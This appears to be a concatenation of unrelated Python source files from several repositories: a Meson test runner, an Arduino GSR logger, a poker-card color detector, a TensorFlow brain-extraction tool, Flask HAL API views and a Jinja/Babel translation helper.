return _run_test(testdir, build_dir, install_dir, extra_args, flags, compile_commands, install_commands, should_fail)
finally:
mlog.shutdown() # Close the log file because otherwise Windows wets itself.
def _run_test(testdir, test_build_dir, install_dir, extra_args, flags, compile_commands, install_commands, should_fail):
test_args = parse_test_args(testdir)
gen_start = time.time()
gen_command = [meson_command, '--prefix', '/usr', '--libdir', 'lib', testdir, test_build_dir]\
+ flags + test_args + extra_args
(returncode, stdo, stde) = run_configure_inprocess(gen_command)
try:
logfile = os.path.join(test_build_dir, 'meson-logs/meson-log.txt')
with open(logfile, errors='ignore') as f:
mesonlog = f.read()
except Exception:
mesonlog = 'No meson-log.txt found.'
gen_time = time.time() - gen_start
if should_fail == 'meson':
if returncode != 0:
return TestResult('', stdo, stde, mesonlog, gen_time)
return TestResult('Test that should have failed succeeded', stdo, stde, mesonlog, gen_time)
if returncode != 0:
return TestResult('Generating the build system failed.', stdo, stde, mesonlog, gen_time)
if 'msbuild' in compile_commands[0]:
sln_name = glob(os.path.join(test_build_dir, '*.sln'))[0]
comp = compile_commands + [os.path.split(sln_name)[-1]]
else:
comp = compile_commands
build_start = time.time()
pc = subprocess.Popen(comp, cwd=test_build_dir,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(o, e) = pc.communicate()
build_time = time.time() - build_start
stdo += o.decode(sys.stdout.encoding)
stde += e.decode(sys.stdout.encoding)
if should_fail == 'build':
if pc.returncode != 0:
return TestResult('', stdo, stde, mesonlog, gen_time)
return TestResult('Test that should have failed to build succeeded', stdo, stde, mesonlog, gen_time)
if pc.returncode != 0:
return TestResult('Compiling source code failed.', stdo, stde, mesonlog, gen_time, build_time)
test_start = time.time()
# Note that we don't test that running e.g. 'ninja test' actually
# works. One hopes that this is a common enough happening that
# it is picked up immediately on development.
(returncode, tstdo, tstde) = run_test_inprocess(test_build_dir)
test_time = time.time() - test_start
stdo += tstdo
stde += tstde
if should_fail == 'test':
if returncode != 0:
return TestResult('', stdo, stde, mesonlog, gen_time)
return TestResult('Test that should have failed to run unit tests succeeded', stdo, stde, mesonlog, gen_time)
if returncode != 0:
return TestResult('Running unit tests failed.', stdo, stde, mesonlog, gen_time, build_time, test_time)
if len(install_commands) == 0:
return TestResult('', '', '', gen_time, build_time, test_time)
else:
env = os.environ.copy()
env['DESTDIR'] = install_dir
pi = subprocess.Popen(install_commands, cwd=test_build_dir, env=env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(o, e) = pi.communicate()
stdo += o.decode(sys.stdout.encoding)
stde += e.decode(sys.stdout.encoding)
if pi.returncode != 0:
return TestResult('Running install failed.', stdo, stde, mesonlog, gen_time, build_time, test_time)
return TestResult(validate_install(testdir, install_dir), stdo, stde, mesonlog, gen_time, build_time, test_time)
def gather_tests(testdir):
tests = [t.replace('\\', '/').split('/', 2)[2] for t in glob(os.path.join(testdir, '*'))]
testlist = [(int(t.split()[0]), t) for t in tests]
testlist.sort()
tests = [os.path.join(testdir, t[1]) for t in testlist]
return tests
def have_d_compiler():
if shutil.which("ldc2"):
return True
elif shutil.which("ldc"):
return True
elif shutil.which("gdc"):
return True
elif shutil.which("dmd"):
return True
return False
def detect_tests_to_run():
all_tests = []
all_tests.append(('common', gather_tests('test cases/common'), False))
all_tests.append(('failing-meson', gather_tests('test cases/failing'), False))
all_tests.append(('failing-build', gather_tests('test cases/failing build'), False))
all_tests.append(('failing-tests', gather_tests('test cases/failing tests'), False))
all_tests.append(('prebuilt', gather_tests('test cases/prebuilt'), False))
all_tests.append(('platform-osx', gather_tests('test cases/osx'), False if mesonlib.is_osx() else True))
all_tests.append(('platform-windows', gather_tests('test cases/windows'), False if mesonlib.is_windows() else True))
all_tests.append(('platform-linux', gather_tests('test cases/linuxlike'), False if not (mesonlib.is_osx() or mesonlib.is_windows()) else True))
all_tests.append(('framework', gather_tests('test cases/frameworks'), False if not mesonlib.is_osx() and not mesonlib.is_windows() else True))
all_tests.append(('java', gather_tests('test cases/java'), False if not mesonlib.is_osx() and shutil.which('javac') else True))
all_tests.append(('C#', gather_tests('test cases/csharp'), False if shutil.which('mcs') else True))
all_tests.append(('vala', gather_tests('test cases/vala'), False if shutil.which('valac') else True))
all_tests.append(('rust', gather_tests('test cases/rust'), False if shutil.which('rustc') else True))
all_tests.append(('d', gather_tests('test cases/d'), False if have_d_compiler() else True))
all_tests.append(('objective c', gather_tests('test cases/objc'), False if not mesonlib.is_windows() else True))
all_tests.append(('fortran', gather_tests('test cases/fortran'), False if shutil.which('gfortran') else True))
all_tests.append(('swift', gather_tests('test cases/swift'), False if shutil.which('swiftc') else True))
all_tests.append(('python3', gather_tests('test cases/python3'), False if shutil.which('python3') else True))
return all_tests
def run_tests(extra_args):
global passing_tests, failing_tests, stop, executor, futures
all_tests = detect_tests_to_run()
logfile = open('meson-test-run.txt', 'w', encoding="utf_8")
junit_root = ET.Element('testsuites')
conf_time = 0
build_time = 0
test_time = 0
executor = conc.ProcessPoolExecutor(max_workers=multiprocessing.cpu_count())
for name, test_cases, skipped in all_tests:
current_suite = ET.SubElement(junit_root, 'testsuite', {'name' : name, 'tests' : str(len(test_cases))})
if skipped:
print('\nNot running %s tests.\n' % name)
else:
print('\nRunning %s tests.\n' % name)
futures = []
for t in test_cases:
# Jenkins screws us over by automatically sorting test cases by name
# and getting it wrong by not doing logical number sorting.
(testnum, testbase) = os.path.split(t)[-1].split(' ', 1)
testname = '%.3d %s' % (int(testnum), testbase)
should_fail = False
if name.startswith('failing'):
should_fail = name.split('failing-')[1]
result = executor.submit(run_test, skipped, t, extra_args, unity_flags + backend_flags, compile_commands, install_commands, should_fail)
futures.append((testname, t, result))
for (testname, t, result) in futures:
result = result.result()
if result is None:
print('Skipping:', t)
current_test = ET.SubElement(current_suite, 'testcase', {'name' : testname,
'classname' : name})
ET.SubElement(current_test, 'skipped', {})
global skipped_tests
skipped_tests += 1
else:
without_install = "" if len(install_commands) > 0 else " (without install)"
if result.msg != '':
print('Failed test%s: %s' % (without_install, t))
print('Reason:', result.msg)
failing_tests += 1
failing_logs.append(result.stdo)
failing_logs.append(result.stde)
else:
print('Succeeded test%s: %s' % (without_install, t))
passing_tests += 1
conf_time += result.conftime
build_time += result.buildtime
test_time += result.testtime
total_time = conf_time + build_time + test_time
log_text_file(logfile, t, result.stdo, result.stde)
current_test = ET.SubElement(current_suite, 'testcase', {'name' : testname,
'classname' : name,
'time' : '%.3f' % total_time})
if result.msg != '':
ET.SubElement(current_test, 'failure', {'message' : result.msg})
stdoel = ET.SubElement(current_test, 'system-out')
stdoel.text = result.stdo
stdeel = ET.SubElement(current_test, 'system-err')
stdeel.text = result.stde
print("\nTotal configuration time: %.2fs" % conf_time)
print("Total build time: %.2fs" % build_time)
print("Total test time: %.2fs" % test_time)
ET.ElementTree(element=junit_root).write('meson-test-run.xml', xml_declaration=True, encoding='UTF-8')
def check_file(fname):
linenum = 1
with open(fname, 'rb') as f:
lines = f.readlines()
for line in lines:
if b'\t' in line:
print("File %s contains a literal tab on line %d. Only spaces are permitted." % (fname, linenum))
sys.exit(1)
if b'\r' in line:
print("File %s contains DOS line ending on line %d. Only unix-style line endings are permitted." % (fname, linenum))
sys.exit(1)
linenum += 1
def check_format():
for (root, _, files) in os.walk('.'):
for file in files:
if file.endswith('.py') or file.endswith('.build') or file == 'meson_options.txt':
fullname = os.path.join(root, file)
check_file(fullname)
def pbcompile(compiler, source, objectfile):
if compiler == 'cl':
cmd = [compiler, '/nologo', '/Fo'+objectfile, '/c', source]
else:
cmd = [compiler, '-c', source, '-o', objectfile]
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def generate_pb_object(compiler, object_suffix):
source = 'test cases/prebuilt/1 object/source.c'
objectfile = 'test cases/prebuilt/1 object/prebuilt.' + object_suffix
pbcompile(compiler, source, objectfile)
return objectfile
def generate_pb_static(compiler, object_suffix, static_suffix):
source = 'test cases/prebuilt/2 static/libdir/best.c'
objectfile = 'test cases/prebuilt/2 static/libdir/best.' + object_suffix
stlibfile = 'test cases/prebuilt/2 static/libdir/libbest.' + static_suffix
pbcompile(compiler, source, objectfile)
if compiler == 'cl':
linker = ['lib', '/NOLOGO', '/OUT:' + stlibfile, objectfile]
else:
linker = ['ar', 'csr', stlibfile, objectfile]
subprocess.check_call(linker)
os.unlink(objectfile)
return stlibfile
def generate_prebuilt():
static_suffix = 'a'
if shutil.which('cl'):
compiler = 'cl'
static_suffix = 'lib'
elif shutil.which('cc'):
compiler = 'cc'
elif shutil.which('gcc'):
compiler = 'gcc'
else:
raise RuntimeError("Could not find C compiler.")
if mesonlib.is_windows():
object_suffix = 'obj'
else:
object_suffix = 'o'
objectfile = generate_pb_object(compiler, object_suffix)
stlibfile = generate_pb_static(compiler, object_suffix, static_suffix)
return (objectfile, stlibfile)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Run the test suite of Meson.")
parser.add_argument('extra_args', nargs='*',
help='arguments that are passed directly to Meson (remember to have -- before these).')
parser.add_argument('--backend', default=None, dest='backend',
choices = backendlist)
options = parser.parse_args()
setup_commands(options.backend)
script_dir = os.path.split(__file__)[0]
if script_dir != '':
os.chdir(script_dir)
check_format()
pbfiles = generate_prebuilt()
try:
run_tests(options.extra_args)
except StopException:
pass
for f in pbfiles:
os.unlink(f)
print('\nTotal passed tests:', passing_tests)
print('Total failed tests:', failing_tests)
print('Total skipped tests:', skipped_tests)
if failing_tests > 0 and ('TRAVIS' in os.environ or 'APPVEYOR' in os.environ):
print('\nMesonlogs of failing tests\n')
for l in failing_logs:
print(l, '\n')
sys.exit(failing_tests)
``` |
{
"source": "Jokubas126/P4_project_applications",
"score": 3
} |
#### File: P4_project_applications/GSR/writeGSR.py
```python
import serial
import matplotlib.pyplot as plt
import time
import statistics
moment = time.strftime("%Y-%b-%d__%Hh%Mm%Ss",time.localtime())
rawdata = []
count = 0
fileName = 'data_' + moment +'.txt'
#the time that the program will be running in seconds 16 min ish
timeOut = 1000
#connect to the arduino
try:
ard = serial.Serial('COM4', baudrate = 9600, timeout = 1)
except:
print('Serial not found!')
#get a list of data
while count < timeOut:
arduinoData = ard.readline()
rawdata.append(str(arduinoData))
count += 1
#clean the data from "b'xxx;xx\n\r" tp "xxx;xx"
def clean(list):
newList = []
for i in range(len(list)):
#starting from the third element in the string
temp=list[i][2:]
#ending at the last fifth string from the end of the string
newList.append(temp[:-5])
return newList
cleandata = clean(rawdata)
#writing the data from the list to the file
def write(list):
file = open(fileName, 'w')
for i in range(len(list)):
file.write(list[i] + '\n')
file.close()
write(cleandata)
``` |
{
"source": "Jokubas126/PokerAssistant_CV",
"score": 3
} |
#### File: Scripts/finalCode/DetectFaceCard.py
```python
import numpy as np
import cv2
def find_face_card(image):
#Returns true if image has yellow BLOBs
# making an object to hold parameters of the blob detection
params = cv2.SimpleBlobDetector_Params()
# define parameters for the blob detector
params.filterByArea = True # allows using area parameter
# these parameters are dependant on image size
params.minArea = 100 # min and max areas of pixels for 1 blob
params.maxArea = 10000
params.filterByColor = True # to care about the color
params.filterByCircularity = False # to not care about circularity (more circular = bigger angles)
params.filterByConvexity = False # to not care about convexity
params.filterByInertia = False # doesn't care how much like a circle it is (difference in radiusw)
## convert to hsv
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, (16, 180, 100), (30, 255, 255)) #Look for colour only existing in face cards
## slice the yellow
imask = mask > 0
yellow = np.zeros_like(image, np.uint8)
yellow[imask] = image[imask]
memes, threshImg = cv2.threshold(yellow, 0, 255, cv2.THRESH_BINARY)
#cv2.imshow("Yellow color: ",threshImg)
params.blobColor = 255
detector = cv2.SimpleBlobDetector_create(params) # making the detector by the parameters set before
keypoints = detector.detect(threshImg) # detecting the blobs
im_with_keypoints = cv2.drawKeypoints(threshImg, keypoints, np.array([]), (0, 0, 255),
cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
#cv2.imshow("Detected blue: ", im_with_keypoints)
blobCount = len(keypoints)
if(blobCount > 0):
return True
else:
return False
``` |
{
"source": "Jokubaskaralius/deepbrain",
"score": 2
} |
#### File: deepbrain/deepbrain/extractor.py
```python
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'}
import tensorflow as tf
import numpy as np
from skimage.transform import resize
import re
import nibabel as nib
from multiprocessing import Pool
PB_FILE = os.path.join(os.path.dirname(__file__), "models", "graph_v2.pb")#"extractor", "graph_v2.pb")
CHECKPOINT_DIR = os.path.join(os.path.dirname(__file__), "models", "v2") #"extractor", "v2")
class Extractor:
def __init__(self):
self.SIZE = 128
self.load_pb()
def load_pb(self):
graph = tf.Graph()
self.sess = tf.compat.v1.Session(graph=graph)
with tf.io.gfile.GFile(PB_FILE, 'rb') as f: #tf.compat.v1.gfile.FastGFile(PB_FILE, 'rb')
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
with self.sess.graph.as_default():
tf.import_graph_def(graph_def)
self.img = graph.get_tensor_by_name("import/img:0")
self.training = graph.get_tensor_by_name("import/training:0")
self.dim = graph.get_tensor_by_name("import/dim:0")
self.prob = graph.get_tensor_by_name("import/prob:0")
self.pred = graph.get_tensor_by_name("import/pred:0")
def load_ckpt(self):
self.sess = tf.Session()
ckpt_path = tf.train.latest_checkpoint(CHECKPOINT_DIR)
saver = tf.train.import_meta_graph('{}.meta'.format(ckpt_path))
saver.restore(self.sess, ckpt_path)
g = tf.get_default_graph()
self.img = g.get_tensor_by_name("img:0")
self.training = g.get_tensor_by_name("training:0")
self.dim = g.get_tensor_by_name("dim:0")
self.prob = g.get_tensor_by_name("prob:0")
self.pred = g.get_tensor_by_name("pred:0")
def run(self, image):
shape = image.shape
img = resize(image, (self.SIZE, self.SIZE, self.SIZE), mode='constant', anti_aliasing=True)
img = (img / np.max(img))
img = np.reshape(img, [1, self.SIZE, self.SIZE, self.SIZE, 1])
prob = self.sess.run(self.prob, feed_dict={self.training: False, self.img: img}).squeeze()
prob = resize(prob, (shape), mode='constant', anti_aliasing=True)
#tf.compat.v1.reset_default_graph()
return prob
def run_wrapper(self, image):
with Pool(1) as p:
return p.apply(self.run, (image,))
def subfolder_list(dir_name):
return [f.path for f in os.scandir(dir_name) if f.is_dir()]
def _process(image):
ext = Extractor()
prob = ext.run(image)
return prob
def process_image(image, _process):
with Pool(1) as p:
temp = p.apply(_process, (image,))
print(temp)
return temp
#Test to see if the GPU resources
#Released fix
def worksForBatch():
#ext = Extractor()
path = "/home/jokubas/DevWork/3rdYearProject/data/grade3"
folders = subfolder_list(path)
cnt = 0
for folder2 in folders:
for folder in subfolder_list(folder2):
if (re.search(".*T1-axial", folder) is not None):#folder1.split(sep='-')[0]) is not None):
for item in os.walk(folder):
file_path = os.path.join(folder, item[2][0])
print(file_path)
img = nib.load(file_path)
data = img.get_fdata()
#prob = ext.run(image)
prob = process_image(data, _process)
mask = prob > 0.5
print(mask)
print("Next")
cnt = cnt + 1
if cnt == 5:
break
while(True):
pass
#worksForBatch()
```
#### File: Jokubaskaralius/deepbrain/setup.py
```python
import sys
from setuptools import setup
if sys.version_info < (3, 5):
raise NotImplementedError("Sorry, you need at least Python 3.5 to use tfserve.")
def readme():
with open("README.md") as f:
return f.read()
with open("requirements.txt") as f:
required = f.read().splitlines()
setup(name="deepbrain",
version="0.1",
description="Deep Learning-based tools for processing brain images",
long_description=readme(),
long_description_content_type="text/markdown",
author="<NAME>",
author_email="<EMAIL>",
url="http://github.com/iitzco/deepbrain",
keywords="deep-learning machine-learning tensorflow ai",
scripts=["bin/deepbrain-extractor"],
packages=["deepbrain"],
license="MIT",
platforms="any",
install_requires=required, # Automatically download dependencies on requirements.txt
python_requires=">3.5",
classifiers=["Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
include_package_data=True # To include everything in MANIFEST.in
)
``` |
{
"source": "jokubasver/rpi-film-capture",
"score": 3
} |
#### File: server/filmCap/control.py
```python
import time
import RPi.GPIO as GPIO
from timeit import default_timer as timer
import logging
import collections
import multiprocessing
class fcControl():
light_pin = 2
red_pin = 3
yellow_pin = 4
trigger_pin = 14
speed = 100
frame_advance_pct=50 #This is the CUSHION - we advance 100 minus this amt after trigger
def __init__(self):
GPIO.setmode(GPIO.BCM)
self.light = lightControl(self.light_pin, True)
self.redled = lightControl(self.red_pin)
self.yellowled = lightControl(self.yellow_pin)
self.motor = stepperControl()
GPIO.setup(self.trigger_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
self.motorstate = 0
self.smart_motor = False
self.smart_headroom = 25
self.triggertime = 0
self.qlen = 5
self.triggertimes = collections.deque([],self.qlen)
self.phototimes = collections.deque([],self.qlen)
def light_on(self):
self.light.on()
def light_off(self):
self.light.off()
def red_on(self):
self.redled.on()
def red_off(self):
self.redled.off()
def yellow_on(self):
self.yellowled.on()
def yellow_off(self):
self.yellowled.off()
def yellow_is_on(self):
return GPIO.input(self.yellow_pin)
def cleanup(self):
logging.info("Cleaning up GPIO")
self.light.off()
self.redled.off()
self.yellowled.off()
self.motor.stop()
GPIO.cleanup()
def motor_wake(self):
self.motor.wake()
def motor_sleep(self):
self.motor.sleep()
def motor_fwd(self, speed=False):
if (not speed):
speed = self.speed
self.motor.fwd(speed)
self.motorstate = 1
def motor_rev(self, speed=False):
if (not speed):
speed = self.speed
self.motor.rev(speed)
self.motorstate = -1
def motor_stop(self):
self.motor.stop()
self.triggertimes.clear()
self.phototimes.clear()
if self.motorstate:
self.motor.center(self.trigger_pin, self.frame_advance_pct, self.motorstate)
self.motorstate = 0
self.motor.sleep()
def calibrate(self):
self.motor.center(self.trigger_pin, self.frame_advance_pct, 1)
def end_photo(self):
newtime = timer()
phototime = newtime - self.triggertime
self.phototimes.appendleft(phototime)
class lightControl:
def __init__(self, pin, reversed=False):
self.pin = pin
self.reversed = reversed
GPIO.setup(pin, GPIO.OUT)
self.off()
def on(self):
GPIO.output( self.pin, not(self.reversed) )
def off(self):
GPIO.output( self.pin, self.reversed )
class stepperControl:
pulse_freq = 1000
#stepper motor control pins
dir_pin = 18
ms1_pin = 22
ms2_pin = 24
sleep_pin = 21
reset_pin = 15
pulse_pin = 25
half_pulse = .001 #for frame advance
steps_per_rev = 200 #also change for MotorDriver class below
def __init__(self):
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.dir_pin, GPIO.OUT)
GPIO.setup(self.pulse_pin, GPIO.OUT)
GPIO.setup(self.ms1_pin, GPIO.OUT)
GPIO.setup(self.ms2_pin, GPIO.OUT)
GPIO.setup(self.sleep_pin, GPIO.OUT)
GPIO.setup(self.reset_pin, GPIO.OUT)
dir=False
GPIO.output(self.dir_pin, dir)
GPIO.output(self.pulse_pin, False)
GPIO.output(self.ms1_pin, False)
GPIO.output(self.ms2_pin, False)
GPIO.output(self.sleep_pin, False)
GPIO.output(self.reset_pin, True)
self.p1 = GPIO.PWM(self.pulse_pin, self.pulse_freq)
def wake(self):
GPIO.output(self.sleep_pin, True)
logging.debug("motor waking")
time.sleep(.1)
def sleep(self):
GPIO.output(self.sleep_pin, False)
logging.debug("motor sleeping")
time.sleep(.1)
def stop(self):
self.p1.stop()
GPIO.output(self.dir_pin, False)
def fwd(self, speed=100):
self.wake()
self.p1.stop()
time.sleep(.5)
self.p1.ChangeFrequency(self.pulse_freq*speed/100)
logging.debug(self.pulse_freq*speed/100)
GPIO.output(self.dir_pin, False)
logging.debug("motor starting fwd")
self.p1.start(20)
def rev(self, speed=100):
self.wake()
self.p1.stop()
time.sleep(.5)
self.p1.ChangeFrequency(self.pulse_freq*speed/100)
GPIO.output(self.dir_pin, True)
logging.debug("motor starting rev")
self.p1.start(20)
def fwdFrame(self, num=1):
self.wake()
logging.debug("fwdFrame "+str(num))
self.windFrame(num)
self.sleep()
def windFrame(self, num=1):
pin=self.pulse_pin #directly accessing for speed
hp=self.half_pulse
for i in range (0,int(self.steps_per_rev*num)):
GPIO.output(pin, True) #used instead of variable for speed
time.sleep(hp) #again, directly entring num for speed
GPIO.output(pin, False) #used instead of variable for speed
time.sleep(hp)
def revFrame(self, num=1): #winds back one more than necessary, then forward to properly frame
logging.debug("revFrame "+str(num))
self.wake()
if num==1:
GPIO.output(self.dir_pin, True)
self.windFrame()
GPIO.output(self.dir_pin, False)
else:
GPIO.output(self.dir_pin, True)
self.windFrame(num+1)
GPIO.output(self.dir_pin, False)
time.sleep(.25)
self.windFrame(1)
self.sleep()
def center(self, trigger_pin, pct, fromState):
#to center a frame in the gate and position the projector
#mechanism properly relative to the photo trigger (i.e. 'pct'
#distance ahead of it. Winding film backwards doesn't position
#correctly, so we need to bump ahead a frame to position after
#rewinding
while GPIO.input(trigger_pin): #if trigger is engaging,reverse NO, FORWARD until it's not
GPIO.output(self.dir_pin, False) #True)
GPIO.output(self.pulse_pin, True)
time.sleep(.001)
GPIO.output(self.pulse_pin, False)
time.sleep(.001)
time.sleep(.2)
while not GPIO.input(trigger_pin): #then forward until it is
GPIO.output(self.dir_pin, False)
GPIO.output(self.pulse_pin, True)
time.sleep(.001)
GPIO.output(self.pulse_pin, False)
time.sleep(.001)
if fromState==-1: #if we had been reversing, jump forward a frame
self.windFrame(1)
logging.debug("Winding 1 frame")
stepsFwd=int(self.steps_per_rev*(100-pct)/100.0)
GPIO.output(self.dir_pin, False)
time.sleep(.01)
logging.debug("Forward "+str(stepsFwd))
for i in range(0,stepsFwd): #now forward enough to leave a proper cushion
GPIO.output(self.pulse_pin, True)
time.sleep(.001)
GPIO.output(self.pulse_pin, False)
time.sleep(.001)
class MotorDriver(multiprocessing.Process):
#a very simple class designed to stick frame-advance in another
#process during captures, so a different core can handle it and it
#won't delay photography - or vice versa
pulse_pin = 25
half_pulse = .0008
steps_per_rev = 200
def __init__(self, cap_event, exit_event):
super(MotorDriver, self).__init__()
self.cap_event=cap_event
self.exit_event=exit_event
logging.debug("MotorDriverInit")
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.pulse_pin, GPIO.OUT)
def run(self):
logging.debug("Motor Frame Advance Process running")
try:
while not self.exit_event.is_set():
if self.cap_event.wait(2):
self.fwdFrame(1)
except KeyboardInterrupt:
logging.debug("Motor Process killed via kbd")
finally:
logging.debug("Motor Frame Advance Process ending")
def fwdFrame(self, num=1):
pin=self.pulse_pin
hp=self.half_pulse
logging.debug("Fframe")
for i in range (0,int(self.steps_per_rev*num)):
GPIO.output(pin, True) #used instead of variable for speed
time.sleep(hp) #again, directly entring num for speed
GPIO.output(pin, False) #used instead of variable for speed
time.sleep(hp)
self.cap_event.clear()
``` |
{
"source": "jokull/flask-halalchemy",
"score": 2
} |
#### File: jokull/flask-halalchemy/flask_halalchemy.py
```python
from flask import request, url_for, current_app, make_response
from flask.helpers import json
from flask.views import MethodView
from werkzeug.utils import cached_property
from dictshield.base import ShieldDocException
from dictshield.document import Document
_error_response_headers = {'Content-Type': 'application/json'}
class FormView(MethodView):
"""
Validates form API requests. Subclass and add the form fields you wish to
validate against. PATCH validates partial updates whereas POST validates
that all required fields are present.
`fields` is a mapping of exposed field names and dictshield The values are
instances of `dictshield.fields.BaseField` to validate against.
"""
fields = {}
validate_on_methods = ['POST', 'PATCH', 'PUT']
def __init__(self, document=None):
if document is None:
cls_name = self.__class__.__name__ + "Document"
self.document = type(cls_name, (Document, ), self.fields)
else:
if not issubclass(document, Document):
raise TypeError("Form documents must be instances of `dictshield.document.Document`")
self.document = document
@cached_property
def data(self):
return request.json or request.form.to_dict()
@cached_property
def clean(self):
return self.document.make_ownersafe(self.document(**self.data).to_python())
def validate(self):
"""
Sets an error attribute with a `field_name`: message dictionary.
Returns `True` if valid and `False` if `errors` is non-empty.
For some fucked up reason dictshield has completely different ways to
validate partial and object integrity updates.
"""
if request.method == "PATCH":
# Allow partial documents when PATCH’ing
validate = self.document.validate_class_partial
self.errors = validate(self.data, validate_all=True)
else:
try:
self.document(**self.data).validate(validate_all=True)
except ShieldDocException, e:
self.errors = e.error_list
else:
self.errors = None
return not bool(self.errors)
def error_response(self):
"""
Return a basic application/json response with status code 422 to inform
the consumer of validation errors in the form request.
"""
errors = dict([(e.field_name, e.reason) for e in self.errors]) # TODO what about multiple errors per field
content = json.dumps(dict(message="Validation error", errors=errors))
return make_response(content, 422, _error_response_headers)
def dispatch_request(self, *args, **kwargs):
if request.method in self.validate_on_methods and not self.validate():
return self.error_response()
return super(FormView, self).dispatch_request(*args, **kwargs)
def schema_response(self):
"""Return a schema+json response for the document. """
return self.document.to_jsonschema(), 200, {
'Content-Type': 'application/schema+json',
'Accept': 'application/json; charset=utf-8'}
class QueryView(MethodView):
"""
Add `url_kwargs` to the view class instance. The HTTP method class methods
do *not* receive the args and kwargs from the Route.
"""
def dispatch_request(self, *args, **kwargs):
self.url_kwargs = kwargs
return super(QueryView, self).dispatch_request()
class ResourceView(QueryView):
content_type = 'application/hal+json'
def get_url(self):
if hasattr(self, "url"):
return self.url
return request.path
def links(self):
links = [{'self': {'href': self.get_url()}}]
if callable(getattr(self.query(), "links", None)):
links += self.query().links()
return links
@property
def json(self):
return dict(_links=self.links(), **self.query().json)
def get(self):
return json.dumps(self.json), 200, {'Content-Type': self.content_type}
@classmethod
def as_resource(cls, endpoint, model_instance=None):
# Instantiate from endpoint and object. Traverse the app url_map and
# find a best match for the subresource URL.
def get_url_kwargs():
for rule in current_app.url_map._rules_by_endpoint[endpoint]:
if 'GET' in rule.methods and rule.arguments:
for arg in rule.arguments:
if hasattr(model_instance, arg):
yield arg, getattr(model_instance, arg)
raise StopIteration()
self = cls()
self.url_kwargs = dict(get_url_kwargs())
self.url = url_for(endpoint, **self.url_kwargs)
if model_instance is not None:
# Avoid n+1 querying by settings `query` to the instance
self.query = lambda: model_instance
return self
class IndexView(QueryView):
"""
Paginated resources. Uses `?page=<int>` URL argument. Route this view like
so:
workout_resource = ResourceView.as_view(Workout, 'workout')
workout_index = IndexView.as_view(Workout, 'workouts', resource=workout_resource)
app.add_url_rule('/workouts/<int:id>', workout_resource, methods=['GET'])
app.add_url_rule('/workouts', workout_index, methods=['GET'])
Notice that a `workout_resource` was created first. This is cleaner since
HAL embeds subresources and we can generate a HAL compliant structure for
this index.
It might be a good idea to order to `query` to get predictable results.
"""
content_type = 'application/hal+json'
per_page = 40
def __init__(self, subresource_endpoint=None):
self.subresource_endpoint = subresource_endpoint
@property
def json(self):
return {'total': self.page.total, 'per_page': self.page.per_page}
def query(self):
raise NotImplementedError()
def links(self):
view_name = request.url_rule.endpoint
_links = {'self': {'href': url_for(view_name)}}
if self.page.pages > 0:
if self.page.page == self.page.pages:
_links['last'] = _links['self']
else:
_links['last'] = {'href': url_for(view_name, page=self.page.pages)}
if self.page.has_next:
_links['next'] = {'href': url_for(view_name, page=self.page.next_num)}
if self.page.has_prev:
_links['previous'] = {'href': url_for(view_name, page=self.page.prev_num)}
return _links
def embedded(self):
endpoint = self.subresource_endpoint
if endpoint is None:
get_json = lambda o: o.json
else:
resource = current_app.view_functions[endpoint].view_class
get_json = lambda o: resource.as_resource(endpoint, o).json
return [get_json(item) for item in self.page.items]
def get(self):
page_num = int(request.args.get('page', 1))
per_page = int(request.args.get('per_page', self.per_page))
per_page = min(per_page, self.per_page) # Upper limit
self.page = self.query().paginate(page_num, per_page=per_page)
content = json.dumps(dict(
_embedded={request.url_rule.endpoint: self.embedded()},
_links=self.links(), **self.json))
return content, 200, {'Content-Type': self.content_type}
``` |
{
"source": "jokull/jinjet",
"score": 2
} |
#### File: jokull/jinjet/jinjet.py
```python
import os, argparse, sys, time
from threading import local
from jinja2 import TemplateNotFound, FileSystemLoader, Environment
# this is a workaround for a snow leopard bug that babel does not
# work around :)
if os.environ.get('LC_CTYPE', '').lower() == 'utf-8':
os.environ['LC_CTYPE'] = 'en_US.utf-8'
from datetime import datetime
from babel import dates, numbers, support, Locale
from babel.messages.frontend import parse_mapping
from babel.util import pathmatch
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
_language = None
_active = local()
def activate_locale(locale):
_active.value = locale
def get_locale():
return _active.value
def get_translations():
"""Returns the correct gettext translations that should be used for
this request. This will never fail and return a dummy translation
object if used outside of the request or if a translation cannot be
found.
"""
translations = support.Translations.load(cli.catalog, [get_locale()])
return translations
def gettext(string, **variables):
"""Translates a string with the current locale and passes in the
given keyword arguments as mapping to a string formatting string.
::
gettext(u'Hello World!')
gettext(u'Hello %(name)s!', name='World')
"""
t = get_translations()
if t is None:
return string % variables
return t.ugettext(string) % variables
_ = gettext
def ngettext(singular, plural, num, **variables):
"""Translates a string with the current locale and passes in the
given keyword arguments as mapping to a string formatting string.
The `num` parameter is used to dispatch between singular and various
plural forms of the message. It is available in the format string
as ``%(num)d`` or ``%(num)s``. The source language should be
English or a similar language which only has one plural form.
::
ngettext(u'%(num)d Apple', u'%(num)d Apples', num=len(apples))
"""
variables.setdefault('num', num)
t = get_translations()
if t is None:
return (singular if num == 1 else plural) % variables
return t.ungettext(singular, plural, num) % variables
def pgettext(context, string, **variables):
"""Like :func:`gettext` but with a context.
"""
t = get_translations()
if t is None:
return string % variables
return t.upgettext(context, string) % variables
def npgettext(context, singular, plural, num, **variables):
"""Like :func:`ngettext` but with a context.
"""
variables.setdefault('num', num)
t = get_translations()
if t is None:
return (singular if num == 1 else plural) % variables
return t.unpgettext(context, singular, plural, num) % variables
def get_locales():
"""Returns a list of all the locales translations exist for. The
list returned will be filled with actual locale objects and not just
strings. A no-op translation is added for the `default_locale`.
"""
baselocale = Locale.parse(cli.baselocale)
result = {baselocale.language: baselocale}
if not os.path.isdir(cli.catalog):
return result
for folder in os.listdir(cli.catalog):
locale_dir = os.path.join(cli.catalog, folder, 'LC_MESSAGES')
